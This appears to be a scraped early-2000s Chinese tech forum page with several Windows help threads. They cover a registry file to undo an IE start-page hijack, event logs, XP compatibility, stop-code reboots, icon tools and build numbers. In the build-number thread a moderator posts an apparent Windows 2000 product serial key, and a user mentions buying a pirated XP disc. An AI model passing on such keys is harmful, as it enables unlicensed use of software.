cjj31 方与圆 积分：2971 发帖：1044 来自：浙江嘉兴 注册：2000-07-05 | 发表于 2002-01-18 21:02:36 按此观看cjj31的个人资料 按此发邮件给cjj31 cjj31 的 oicq 是7777435,查看 7777435 的资料 收藏该主题供以后查看 发送悄悄话给cjj31 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cjj31的IP 1、致命的异常终止决不允许 2、以这个次序编写：用户手册、说明书、帮助、源代码 3、除非你使用Risk Factor Analysis (RFA),否则一个程序将花费双倍你认为开发所需的时间——重复工作 4、编码工作量应该不超过开发工作的百分之二十 5、测试应该只少占工程的百分之三十 6、注释应该至少要占源代码的百分之二十 7、一条错误信息应该报告什么发生了，关于这个用户能够作什么，程序下一步要做什么，以及哪一行代码造成了该问题？可能也要注意时间，用户名和环境 8、好的程序将自动地发送最近的错误信息给永久性媒体 9、调用一个例程三次？隐藏它调用一次？不要隐藏 10、除了菜单和错误陷阱，例程应精确地只需要一个入口和一个出口 11、带有清晰的变量名和例程名的文档代码 12、数据库应该是相关的 13、总是采用最好的算法 14、首先优化最慢的例程，使用 Profiler 标志他们 15、最好的开发语言通常是具有最短开发时间的那个 16、要求顾客在用户手册和说明书上签字 17、首先编写更具风险的模块 18、让简单的维护成为引导你的灯光 19、检查你写的每个签名和拼写 20、不要写任何你能够用一个3 * 5 卡片封面复制的程序 21、知道何时应该完成何事 22、没有任何列表是完善的 23、困难不是你正在看之处 24、存在的规则和规律可以让人们免于思考 我笨故我菜！ 好好学习，天天向上!
上一贴 | 下一贴
快速回复 | 主题：计算机编程的24条法则(转贴)
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


ie主页按纽灰化……

计算机技术
ie主页按纽灰化……

上一贴 | 下一贴
发表人 主题: ie主页按纽灰化……
ahxiao

初级用户
积分：51
发帖：22
来自：
注册：2001-07-26
 发表于 2001-11-26 20:48:55 按此观看ahxiao的个人资料 按此发邮件给ahxiao 访问ahxiao的主页 ahxiao 的 oicq 是29776205,查看 29776205 的资料 收藏该主题供以后查看 发送悄悄话给ahxiao 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ahxiao的IP
无法更改设置
我输了一个reg文件，如下：
REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
"Window Title"="Microsoft Internet Explorer"
"Start Page"="about:blank"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="Microsoft Internet Explorer"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon]
"LegalNoticeCaption"=""
"LegalNoticeText"=""
主页变成了www.sqreg.com而非about：blank啊，为何？
另外如何把灰化的按纽改回来？
2。一开机，自动弹出很多IE窗口，？？
3。我用的winme开始菜单中为何无“运行”，如何进入regedit？
4。硬盘d,e分区隐藏，无法看到，如何恢复？
问题较多，麻烦大家了，hehe

Nothing to say
小诺

替补版主
积分：6499
发帖：3746
来自：Shanghai
注册：2000-09-16
 发表于 2001-11-26 22:30:33 按此观看小诺的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给小诺 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小诺的IP
http://sh.iduba.net/download/other/tool_011027_RegSolve.htm
jorkof

终级用户
积分：1197
发帖：367
来自：北京
注册：2001-06-16
 发表于 2001-11-27 06:35:27 按此观看jorkof的个人资料 按此发邮件给jorkof 访问jorkof的主页 jorkof 的 oicq 是3707274,查看 3707274 的资料 发送悄悄话给jorkof 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jorkof的IP
最简单的使用软件更改主页变灰的方法就是使用windows优化大师

≮曾经沧海难为水jorkof.my163.com除却巫山不是云≯
上一贴 | 下一贴
快速回复 | 主题：ie主页按纽灰化……
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


关于WIN2000的日志问题

计算机技术
关于WIN2000的日志问题

上一贴 | 下一贴
发表人 | 主题: 关于WIN2000的日志问题
幽灵 超级用户 积分：358 发帖：216 来自：上海 注册：2001-02-25 | 发表于 2001-12-02 22:29:17 按此观看幽灵的个人资料 按此发邮件给幽灵 幽灵 的 oicq 是15868256,查看 15868256 的资料 收藏该主题供以后查看 发送悄悄话给幽灵 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看幽灵的IP win2000的日志文件是放在哪里的啊？如果把它删掉要紧么？ 上帝会保佑我的，一切都会有的！
BIGBUG 终级用户 积分：1095 发帖：720 来自：不一定 注册：2001-03-21 | 发表于 2001-12-02 23:10:17 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP 控制面板——管理工具——事件查看器，右键点击下拉项，清除。 还可以选属性进行设置 删除它一般没什么关系，不过占地不大，留着更好 [这消息被BIGBUG编辑过(编辑时间2001-12-02 23:11:06)] 等我想想再签
幽灵 超级用户 积分：358 发帖：216 来自：上海 注册：2001-02-25 | 发表于 2001-12-03 00:35:46 按此观看幽灵的个人资料 按此发邮件给幽灵 幽灵 的 oicq 是15868256,查看 15868256 的资料 发送悄悄话给幽灵 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看幽灵的IP OK！ 上帝会保佑我的，一切都会有的！
凌志 终级用户 积分：532 发帖：163 来自：鞍山 注册：2001-01-09 | 发表于 2002-01-03 15:09:19 按此观看凌志的个人资料 按此发邮件给凌志 访问凌志的主页 凌志 的 oicq 是5685200,查看 5685200 的资料 发送悄悄话给凌志 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看凌志的IP 突然有一天启动Win2000时候说”页面文件太小，无法启动“，然后就真的过不去了，怎么办？ 网络天下 四海一家
上一贴 | 下一贴
快速回复 | 主题：关于WIN2000的日志问题
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


关于winxp的兼容性问题请教各位

计算机技术
关于winxp的兼容性问题请教各位

上一贴 | 下一贴
发表人 主题: 关于winxp的兼容性问题请教各位
crystal

水晶
积分：2499
发帖：2822
来自：QUAKE
注册：2000-01-30
 发表于 2001-11-29 00:01:48 按此观看crystal的个人资料 该用户不允许显示它的电子邮件 访问crystal的主页 crystal 的 oicq 是1073810,查看 1073810 的资料 收藏该主题供以后查看 发送悄悄话给crystal 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看crystal的IP
机器要格了，准备装2个系统，一个是winXP，一个是w2k server，不知道现在运行的大部分软件能否在XP下正常运行？

我需要在XP下安装SQL Server2k还有MM系列的软件，也就是作为调试asp网站的实验机啦，各位有什么忠告吗？谢谢！

书山有路勤为径，学海无涯苦作舟　　Current Project : JSP Nuke
flyingbird

想飞的心
积分：4546
发帖：1672
来自：
注册：1999-12-22
 发表于 2001-11-29 04:37:19 按此观看flyingbird的个人资料 按此发邮件给flyingbird 发送悄悄话给flyingbird 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看flyingbird的IP
既然你要安装W2K server， 为什么要把SQL Server装在XP的下面， XP只是client OS.

如果是个人调试ASP, 好象用不到双系统。 如果是commercial 测试， 就更应该让服务器专门化。

windows XP Pro和Windows 2000 Pro比没有什么革命性的改变， 有必要升级来做测试吗？

just my 2 cents.

行者无疆

Blueidea Web Team
Team member

crystal

水晶
积分：2499
发帖：2822
来自：QUAKE
注册：2000-01-30
 发表于 2001-11-29 11:05:39 按此观看crystal的个人资料 该用户不允许显示它的电子邮件 访问crystal的主页 crystal 的 oicq 是1073810,查看 1073810 的资料 发送悄悄话给crystal 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看crystal的IP
既然这样，那就装W2k高级服务器版，MM系列的软件和SQL Server也装在里面，XP装一个玩玩

书山有路勤为径，学海无涯苦作舟　　Current Project : JSP Nuke
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-29 11:34:25 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
winxp下只能安装sql的桌面版~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

BIGBUG

终级用户
积分：1095
发帖：720
来自：不一定
注册：2001-03-21
 发表于 2001-11-29 22:03:50 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
有关站点调试的软件建议全部装在SERVER下，SQL server在非服务器版下只能装桌面版功能不全。

一般设计类软件在XP下都能安装，有名的欧美游戏都能运行，目前为止我还没碰到在XP下装不上的软件（个别硬件驱动除外）

还有，server的分区一定要用NTFS

等我想想再签
上一贴 | 下一贴
快速回复 | 主题：关于winxp的兼容性问题请教各位
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


win2000professional中文版的版本号?谢谢!

计算机技术
win2000professional中文版的版本号?谢谢!

上一贴 | 下一贴
发表人 主题: win2000professional中文版的版本号?谢谢!
len

SlowHorse
积分：1192
发帖：568
来自：hebei
注册：2001-09-29
 发表于 2001-11-29 14:57:18 按此观看len的个人资料 按此发邮件给len len 的 oicq 是3248586,查看 3248586 的资料 收藏该主题供以后查看 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
我也想知道自己的WIN2K是不是正式版的?谢谢.

Dripping water wears away a stone.
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-29 15:05:32 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
根据~~~
此处不能提供 谢谢~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

len

SlowHorse
积分：1192
发帖：568
来自：hebei
注册：2001-09-29
 发表于 2001-11-29 15:11:44 按此观看len的个人资料 按此发邮件给len len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
我是说版本号.不是序列号,老兄帮帮忙吧!

Dripping water wears away a stone.
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-29 15:20:59 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
len在上个帖子中说
引用:
我是说版本号.不是序列号,老兄帮帮忙吧!

看你表情这么复杂

Windows 2000 Professional中文正式版 版本号为2195

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

len

SlowHorse
积分：1192
发帖：568
来自：hebei
注册：2001-09-29
 发表于 2001-11-29 15:26:05 按此观看len的个人资料 按此发邮件给len len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
这就是了.多谢了. ;)

Dripping water wears away a stone.
上一贴 | 下一贴
快速回复 | 主题：win2000professional中文版的版本号?谢谢!
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


WIN2K pro自动重启问题

计算机技术
WIN2K pro自动重启问题

上一贴 | 下一贴
发表人 主题: WIN2K pro自动重启问题
wx@ay

看不懂
积分：7349
发帖：5076
来自：ay.ha.cn
注册：1999-12-23
 发表于 2001-11-26 13:36:05 wx@ay 的 oicq 是1850777,查看 1850777 的资料 收藏该主题供以后查看 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
一台计算机，操作系统为 WIN2K PRO+IIS5+IE5.5 ，CPU 为 赛扬II 800Mhz，内存128+64（PC100）
开机正常，但是经常莫名重新启动，打开任何应用程序均会引起重启，甚至IE55。
重启错误报告为：
引用:
2001-11-26 12:20:48 Save Dump 1001 N/A
计算机已经从检测错误重新启动。
检测错误： 0x0000001e (0xc0000005,0xa00461d1,0x00000000,0x016a0000) MS WIN2000

请问此故障是由于硬件检测引起还是系统问题？

另：该机装有双网卡，禁用后，在没有任何应用程序启动的情况下，
CPU占用就会达到100%，进程中有一个WINMGMT.EXE，PID为596，CPU 最高为98，
最低为53（一般均在90以上），内存使用4536K，无法在任务管理器中结束。

后在 “计算机管理” 中将Windows Mangement Instrumentation 改为手动启动，
重新启动后该进程消失。

请问：WINMGME该进程的作用是什么？
将该进程改为手动启动后会对计算机产生什么影响？

进程中还有一个System Idle Process 其PID为0 ，CPU占用97，内存 16
无法结束。

请问，这个进程是什么？能否禁止？如何禁止？

谢谢！！！

[这消息被wx@ay编辑过(编辑时间2001-11-26 13:43:30)]

Think like a Genius.

忘掉她/忘掉你没有的东西/忘掉别人的东西/忘掉你失去以后就不能再得到地东西/忘掉仇恨/忘掉屈辱/就像犀牛忘记草原/水鸟忘记湖泊/地狱忘记天堂/落叶忘记风/但是我决定不忘掉你

浸食·花葬

极度色郎
积分：7374
发帖：2638
来自：|翅膀|
注册：2001-07-09
 发表于 2001-11-26 13:46:18 按此观看浸食·花葬的个人资料 按此发邮件给浸食·花葬 访问浸食·花葬的主页 浸食·花葬 的 oicq 是7368317,查看 7368317 的资料 发送悄悄话给浸食·花葬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看浸食·花葬的IP
System Idle Process
这个进程是不可以从任务管理器中关掉的。
这个进程是作为单线程运行在每个处理器上，并在系统不处理其他线程的时候分派处理器的时间。

幕末 ——
京都に人斬り拔刀齋と呼ばれた志士がぃた.
修羅さながらに人を斬り.その血刀を以って新
時代『明治』を切り拓ぃたその男は.動亂の
終結と共に人々の前から姿を消した ——
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-26 13:57:35 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
莫名重起问题~有程序非法导致~

我的电脑--->右键---->属性----->高级----->启动和故障恢复其中失败自动重起钩去掉

winmgmt.exe
winmgmt是win2000客户端管理的核心组件。当客户端应用程序连接或当管理程序需要他本身的服务时这个进程初始化。

System Idle Process
这个进程不可以从任务管理器中关掉
这个进程是作为单线程运行在每个处理器上，并在系统不处理其他线程的时候分派处理器的时间。

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-11-26 14:14:29 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
两根内存，把64的那根拔去试一下！

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

wx@ay

看不懂
积分：7349
发帖：5076
来自：ay.ha.cn
注册：1999-12-23
 发表于 2001-11-26 17:54:33 wx@ay 的 oicq 是1850777,查看 1850777 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
张无忌在上个帖子中说
引用:
两根内存，把64的那根拔去试一下！

不行。全拔了换了一根新的PC133的128也会自动重新启动。

[这消息被wx@ay编辑过(编辑时间2001-11-26 21:24:28)]

Think like a Genius.

忘掉她/忘掉你没有的东西/忘掉别人的东西/忘掉你失去以后就不能再得到地东西/忘掉仇恨/忘掉屈辱/就像犀牛忘记草原/水鸟忘记湖泊/地狱忘记天堂/落叶忘记风/但是我决定不忘掉你

wx@ay

看不懂
积分：7349
发帖：5076
来自：ay.ha.cn
注册：1999-12-23
 发表于 2001-11-26 17:57:28 wx@ay 的 oicq 是1850777,查看 1850777 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
yunbin在上个帖子中说
引用:
winmgmt.exe
winmgmt是win2000客户端管理的核心组件。当客户端应用程序连接或当管理程序需要他本身的服务时这个进程初始化。

System Idle Process
这个进程不可以从任务管理器中关掉
这个进程是作为单线程运行在每个处理器上，并在系统不处理其他线程的时候分派处理器的时间。

占用CPU资源太多啊！
WINMGMT我已经关了，会对计算机产生不良影响吗？

安装双网卡就是要做代理服务器用的，如果CPU总是占用这么多，还能玩儿吗？

[这消息被wx@ay编辑过(编辑时间2001-11-26 21:18:09)]

Think like a Genius.

忘掉她/忘掉你没有的东西/忘掉别人的东西/忘掉你失去以后就不能再得到地东西/忘掉仇恨/忘掉屈辱/就像犀牛忘记草原/水鸟忘记湖泊/地狱忘记天堂/落叶忘记风/但是我决定不忘掉你

yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-27 09:54:06 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
wx@ay在上个帖子中说
引用:
yunbin在上个帖子中说
引用:
winmgmt.exe
winmgmt是win2000客户端管理的核心组件。当客户端应用程序连接或当管理程序需要他本身的服务时这个进程初始化。

System Idle Process
这个进程不可以从任务管理器中关掉
这个进程是作为单线程运行在每个处理器上，并在系统不处理其他线程的时候分派处理器的时间。

占用CPU资源太多啊！
WINMGMT我已经关了，会对计算机产生不良影响吗？

安装双网卡就是要做代理服务器用的，如果CPU总是占用这么多，还能玩儿吗？

客户端应用程序连接或当管理程序需要他本身的服务时这个进程初始化 呵呵～你能禁止客户端应用程序连接就可以不用到它～

做上网代理服务器器？？？ 那没有什么负担啊～ 我们一台c433 128M 的机子轻轻松松代30多台电脑没有问题～ 本机还能用来做东西～

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

wx@ay

看不懂
积分：7349
发帖：5076
来自：ay.ha.cn
注册：1999-12-23
 发表于 2001-11-27 20:44:03 wx@ay 的 oicq 是1850777,查看 1850777 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
OK。

重启的问题：

关闭了那个自动重启项，
但是却会蓝屏了
报告物理内存出错。
换了一条新内存，内存插槽调换了一遍，还是会出现。

是主板有问题？

Think like a Genius.

忘掉她/忘掉你没有的东西/忘掉别人的东西/忘掉你失去以后就不能再得到地东西/忘掉仇恨/忘掉屈辱/就像犀牛忘记草原/水鸟忘记湖泊/地狱忘记天堂/落叶忘记风/但是我决定不忘掉你

yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-27 20:48:36 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
wx@ay在上个帖子中说
引用:
OK。

重启的问题：

关闭了那个自动重启项，
但是却会蓝屏了
报告物理内存出错。
换了一条新内存，内存插槽调换了一遍，还是会出现。

是主板有问题？

物理内存出错? 是内存地址段错误吧` 可能你的系统有问题~ 病毒?~ 软件冲突?

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

apple

初级用户
积分：81
发帖：39
来自：bj
注册：2000-06-21
 发表于 2001-11-28 11:34:27 按此观看apple的个人资料 按此发邮件给apple 发送悄悄话给apple 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看apple的IP
我也遇到过这种情况，总是系统自己启动，换了内存没用，从装系统也没用，后来，我换了块主板就没事了。我觉得是硬件的问题。
iris

终级用户
积分：1088
发帖：358
来自：Beijing
注册：2000-10-31
 发表于 2001-11-28 22:39:47 按此观看iris的个人资料 按此发邮件给iris iris 的 oicq 是15602095,查看 15602095 的资料 发送悄悄话给iris 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看iris的IP
有些主板装 w2k 后需安装主板的驱动程序

  Iris is Iris
上一贴 | 下一贴
快速回复 | 主题：WIN2K pro自动重启问题
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


WinXP中文正式版的版本号是多少？2600吗？

计算机技术
WinXP中文正式版的版本号是多少？2600吗？

上一贴 | 下一贴
发表人 主题: WinXP中文正式版的版本号是多少？2600吗？
efriend

初级用户
积分：136
发帖：54
来自：
注册：2001-10-01
 发表于 2001-11-27 12:10:23 按此观看efriend的个人资料 按此发邮件给efriend efriend 的 oicq 是55224321,查看 55224321 的资料 收藏该主题供以后查看 发送悄悄话给efriend 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看efriend的IP
我买了一张D版的XP，但不知道是不是正式版，在进安全模式的时候显示版本号2600，不知此版本是不是正式发售的版本啊？

Sun
小美

初级用户
积分：76
发帖：61
来自：beijing
注册：2001-07-20
 发表于 2001-11-27 13:55:49 按此观看小美的个人资料 按此发邮件给小美 小美 的 oicq 是33718628,查看 33718628 的资料 发送悄悄话给小美 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小美的IP
[*****-*****-*****-*****-*****]
professional版的

这里不提供注册码。请注意！！！

[这消息被hellslayer编辑过(编辑时间2001-11-27 13:55:56)]

yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-27 14:07:26 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
小美在上个帖子中说
引用:
[*****-*****-*****-*****-*****]
professional版的

这里不提供注册码。请注意！！！

呵呵~ 这么了解~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

efriend

初级用户
积分：136
发帖：54
来自：
注册：2001-10-01
 发表于 2001-11-28 14:12:20 按此观看efriend的个人资料 按此发邮件给efriend efriend 的 oicq 是55224321,查看 55224321 的资料 发送悄悄话给efriend 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看efriend的IP
呵呵，知道了，多谢，我只要版本号，不需要提供注册码。

Sun
hellslayer

初级用户
积分：20
发帖：251
来自：不能上网的学校
注册：2001-04-04
 发表于 2001-11-28 14:36:05 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP
2600在英文版里就是正式版的了。中文的应该也是吧。（我用的是英文版的）

"我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
len

SlowHorse
积分：1192
发帖：568
来自：hebei
注册：2001-09-29
 发表于 2001-11-29 14:29:31 按此观看len的个人资料 按此发邮件给len len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
那WIN2000professional中文正式版的版本号是多少呢？

Dripping water wears away a stone.
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-29 15:11:30 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
len在上个帖子中说
引用:
那WIN2000professional中文正式版的版本号是多少呢？

SN:PQHKR-G4JFW-VTY3P-G4WQ2-88CTW

算是破例 :D

[这消息被yunbin编辑过(编辑时间2001-11-29 15:10:41)]

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

len

SlowHorse
积分：1192
发帖：568
来自：hebei
注册：2001-09-29
 发表于 2001-11-29 15:19:24 按此观看len的个人资料 按此发邮件给len len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
楼上的哥们,谢谢了!
不过,我是想知道版本号,不是序列号.就是在系统属性窗口上部显示的版本号.
我的是5.0(2195).

Dripping water wears away a stone.
上一贴 | 下一贴
快速回复 | 主题：WinXP中文正式版的版本号是多少？2600吗？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


请问怎么改变windows默认的一些图标！

计算机技术
请问怎么改变windows默认的一些图标！

上一贴 | 下一贴
发表人 | 主题: 请问怎么改变windows默认的一些图标！
lxzlzx 初级用户 积分：33 发帖：9 来自： 注册：2001-03-01 | 发表于 2001-11-27 08:46:31 按此观看lxzlzx的个人资料 按此发邮件给lxzlzx 收藏该主题供以后查看 发送悄悄话给lxzlzx 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lxzlzx的IP 请问怎么改变windows默认的一些图标！比如说文件夹图标，默认的都是一些黄色的图标，我想改变。请教高手在那里能够修改。谢谢
jorkof 终级用户 积分：1197 发帖：367 来自：北京 注册：2001-06-16 | 发表于 2001-11-27 09:56:37 按此观看jorkof的个人资料 按此发邮件给jorkof 访问jorkof的主页 jorkof 的 oicq 是3707274,查看 3707274 的资料 发送悄悄话给jorkof 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jorkof的IP 用过侠客系统修改器吗？其它的象兔子什么的也可以 ≮曾经沧海难为水jorkof.my163.com除却巫山不是云≯
yunbin 经典强盗 现任版主 积分：2292 发帖：1001 来自：火星 注册：2001-09-27 | 发表于 2001-11-27 10:02:55 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 推荐～Microangelo http://www.kissting.com/forum/showtopic.asp?TOPIC_ID=4551&Forum_id=11&page= A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
lxzlzx 初级用户 积分：33 发帖：9 来自： 注册：2001-03-01 | 发表于 2001-11-27 12:49:28 按此观看lxzlzx的个人资料 按此发邮件给lxzlzx 发送悄悄话给lxzlzx 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lxzlzx的IP thanks~~
上一贴 | 下一贴
快速回复 | 主题：请问怎么改变windows默认的一些图标！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


win2000安装参数

计算机技术
win2000安装参数

上一贴 | 下一贴
发表人 主题: win2000安装参数
yunbin
